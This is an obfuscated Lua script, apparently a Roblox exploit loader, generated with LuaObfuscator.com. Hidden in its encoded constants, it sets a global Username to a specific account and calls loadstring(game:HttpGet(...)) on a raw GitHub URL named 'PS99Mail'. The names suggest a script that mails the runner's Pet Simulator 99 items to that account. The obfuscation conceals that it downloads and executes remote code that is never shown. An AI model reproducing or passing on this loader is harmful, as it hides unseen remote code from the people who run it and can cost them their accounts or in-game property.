--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v95=0;local v96;while true do if (v95==1) then return v96;end if (v95==0) then v96=v5(v82,v19);v19=nil;v95=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=(933 -(857 + 74))^(v32-((143 + 426) -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * (1133 -(282 + 595))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (1068 -(68 + 997)) );v18=v18 + (1274 -(226 + 1044)) ;return (v40 * 16777216) + (v39 * (285370 -219834)) + (v38 * (373 -(32 + 0 + 85))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,958 -((2378 -(998 + 488)) + 65) ,26 -6 ) * ((4 -2)^(72 -40))) + v41 ;local v45=v20(v42,38 -(6 + 11) ,56 -25 );local v46=((v20(v42,56 -(20 + 4) )==(351 -(87 + 263))) and  -(181 -(67 + 113))) or (792 -(368 + 423)) ;if (v45==(0 -0)) then if (v44==(0 + 0)) then return v46 * (0 -0) ;else local v88=0 -(772 -(201 + 571)) ;while true do if (v88==(0 + 0)) then v45=3 -2 ;v43=0;break;end end end elseif (v45==2047) then return ((v44==((2090 -(116 + 1022)) -(802 + 150))) and (v46 * ((2 -1)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(745 + 278) ) * (v43 + (v44/((440 -(145 + 293))^(1049 -(915 + (341 -259)))))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;local v49={};for v65=3 -2 , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (4~=v50) then else while true do if (3~=v51) then else v58=nil;while true do local v97=0;while true do if (v97==1) then if (v52==(0 + 0)) then local v121=574 -(507 + 67) ;local v122;while true do if (v121==(1749 -(1013 + 736))) then v122=0;while true do if ((1 + 0)==v122) then v55={};v52=2 -1 ;break;end if (v122~=(0 -0)) then else local v163=0;while true do if ((868 -(550 + 317))==v163) then v122=1 -0 ;break;end if (v163~=(0 -0)) then else v53={};v54={};v163=2 -1 ;end end end end break;end end end if (v52==(287 -(134 + 151))) then local v123=0;local v124;while true do if (v123==(1665 -(970 + 695))) then v124=0;while true do if (v124==0) then for v165=1,v57 do local v166=0;local v167;local v168;while true do if (v166~=0) then else local v174=0 -0 ;while true do if (v174==0) then local v176=1990 -(582 + 1408) ;while true do if (v176==(0 -0)) then v167=v21();v168=nil;v176=1;end if (v176==(1 -0)) then v174=1;break;end end end if (v174==(3 -2)) then v166=1825 -(1195 + 629) ;break;end end end if (v166~=1) then else if (v167==1) then v168=v21()~=0 ;elseif (v167==(2 -0)) then v168=v24();elseif (v167==3) then v168=v25();end v58[v165]=v168;break;end end end v56[244 -(187 + 54) ]=v21();v124=781 -(162 + 618) ;end if (v124==(1 + 0)) then for v169=1,v23() do local v170=0 + 0 ;local v171;local v172;local v173;while true do if (v170~=1) then else v173=nil;while true do if (v171==1) then while true do if (v172==(0 -0)) then v173=v21();if (v20(v173,1,1 -0 )==(0 + 0)) then local v177=0;local v178;local v179;local v180;local v181;while true do if (v177==(1637 -(1373 + 263))) then local v182=0;while true do if (v182==0) then v180=nil;v181=nil;v182=1001 -(451 + 549) ;end if (v182==(1 + 0)) then v177=2;break;end end end if (v177~=2) then else while true do if (v178==(1 -0)) then local v184=0 -0 ;while true do if (0==v184) then v181={v22(),v22(),nil,nil};if (v179==0) then local v194=341 -(218 + 123) ;local v195;while true do if (v194~=(1581 -(1535 + 46))) then else v195=0;while true do if (v195~=(0 + 0)) then else v181[3]=v22();v181[1 + 3 ]=v22();break;end end break;end end elseif (v179==1) then v181[3]=v23();elseif (v179==2) then v181[3]=v23() -((562 -(306 + 254))^(1 + 15)) ;elseif (v179~=3) then else local v200=0 -0 ;local v201;while true do if (v200~=(1467 -(899 + 568))) then else v201=0;while true do if (v201==(0 + 0)) then v181[7 -4 ]=v23() -(2^(619 -(268 + 335))) ;v181[4]=v22();break;end end break;end end end v184=1;end if (v184~=(291 -(60 + 230))) then else v178=2;break;end end end if (v178~=3) then else if (v20(v180,3,575 -(426 + 146) )~=1) then else v181[4]=v58[v181[1 + 3 ]];end v53[v169]=v181;break;end if (v178~=(1458 -(282 + 1174))) then else if (v20(v180,1,812 -(569 + 242) )==1) then v181[5 -3 ]=v58[v181[1 + 1 ]];end if (v20(v180,1026 -(706 + 318) ,1253 -(721 + 530) )==(1272 -(945 + 326))) then v181[7 -4 ]=v58[v181[3 + 0 ]];end v178=703 -(271 + 429) ;end if (v178==0) then local v186=0;local v187;while true do if (v186~=0) then else v187=0;while true do if (v187==0) then v179=v20(v173,2 + 0 ,1503 -(1408 + 92) );v180=v20(v173,4,6);v187=1;end if (v187~=1) then else v178=1087 -(461 + 625) ;break;end end break;end end end end break;end if (v177==(1288 -(993 + 295))) then local v183=0;while true do if (v183~=1) then else v177=1 + 0 ;break;end if (v183==(1171 -(418 + 753))) then v178=0;v179=nil;v183=1 + 0 ;end end end end end break;end end break;end if (v171==0) then v172=0 + 0 ;v173=nil;v171=1;end end break;end if (v170==(0 + 0)) then v171=0 + 0 ;v172=nil;v170=530 -(406 + 123) ;end end end v52=3;break;end end break;end end end break;end if (v97~=(1769 -(1749 + 20))) then else if (v52==(1 + 0)) then local v125=1322 -(1249 + 73) ;while true do if (v125==(1 + 0)) then v58={};v52=1147 -(466 + 679) ;break;end if (v125==0) then local v156=0 -0 ;while true do if ((2 -1)~=v156) then else v125=1901 -(106 + 1794) ;break;end if (v156==0) then v56={v53,v54,nil,v55};v57=v23();v156=1;end end end end end if (v52==3) then local v126=0;while true do if (0~=v126) then else for v161=1,v23() do v54[v161-(2 -1) ]=v28();end return v56;end end end v97=1;end end end break;end if (v51==(115 -(4 + 110))) then v54=nil;v55=nil;v51=2;end if (v51==(586 -(57 + 527))) then local v93=1427 -(41 + 1386) ;while true do if (v93==(103 -(17 + 86))) then v56=nil;v57=nil;v93=1 + 0 ;end if (v93~=(1 -0)) then else v51=3;break;end end end if (v51~=(0 -0)) then else local v94=166 -(122 + 44) ;while true do if (v94==(1 -0)) then v51=3 -2 ;break;end if (v94==0) then v52=0;v53=nil;v94=1 + 0 ;end end end end break;end if (1~=v50) then else v53=nil;v54=nil;v50=1 + 1 ;end if (v50==(5 -2)) then v57=nil;v58=nil;v50=69 -(30 + 35) ;end if (v50==0) then v51=0;v52=nil;v50=1;end if (2~=v50) then else v55=nil;v56=nil;v50=3 + 0 ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80>0) then local v98=0;local v99;local v100;local v101;local v102;while true do if (v98==2) then for v147=v99,v72 do v102=v102 + 1 ;v77[v147]=v100[v102];end break;end if (v98==0) then v99=v79[2];v100,v101=v70(v77[v99](v13(v77,v99 + 1 ,v79[3])));v98=1;end if (v98==1) then v72=(v101 + v99) -1 ;v102=0;v98=2;end end elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=2) then local v103=v79[2];local v104=v77[v79[3]];v77[v103 + 1 ]=v104;v77[v103]=v104[v79[4]];elseif (v80==3) then v77[v79[2]]();elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end elseif (v80<=7) then if (v80<=5) then v61[v79[3]]=v77[v79[2]];elseif (v80>6) then local v128=0;local v129;while true do if (0==v128) then v129=v79[2];v77[v129]=v77[v129](v13(v77,v129 + 1 ,v72));break;end end else v77[v79[2]]=v79[3];end elseif (v80<=8) then v71=v79[3];elseif (v80==9) then local v132=v79[2];local v133=v77[v79[3]];v77[v132 + 1 ]=v133;v77[v132]=v133[v79[4]];elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end elseif (v80<=15) then if (v80<=12) then if (v80==11) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else for v116=v79[2],v79[3] do v77[v116]=nil;end end elseif (v80<=13) then do return;end elseif (v80==14) then do return;end else local v138=0;local v139;while true do if (0==v138) then v139=v79[2];v77[v139]=v77[v139](v13(v77,v139 + 1 ,v72));break;end end end elseif (v80<=18) then if (v80<=16) then local v111=v79[2];local v112,v113=v70(v77[v111](v13(v77,v111 + 1 ,v79[3])));v72=(v113 + v111) -1 ;local v114=0;for v118=v111,v72 do v114=v114 + 1 ;v77[v118]=v112[v114];end elseif (v80>17) then v77[v79[2]]=v79[3];else v61[v79[3]]=v77[v79[2]];end elseif (v80<=19) then v71=v79[3];elseif (v80==20) then v77[v79[2]]();else for v145=v79[2],v79[3] do v77[v145]=nil;end end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030D3O007975646970756E2O676F6C3237030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O002O123O00014O000C000100013O00264O0002000100010004133O00020001002O12000100013O00262O00010005000100010004133O00050001002O12000200033O001211000200023O001204000200043O001204000300053O002002000300030006002O12000500074O0010000300054O000F00023O00022O00030002000100010004133O001400010004133O000500010004133O001400010004133O000200012O000D3O00017O00",v9(),...);
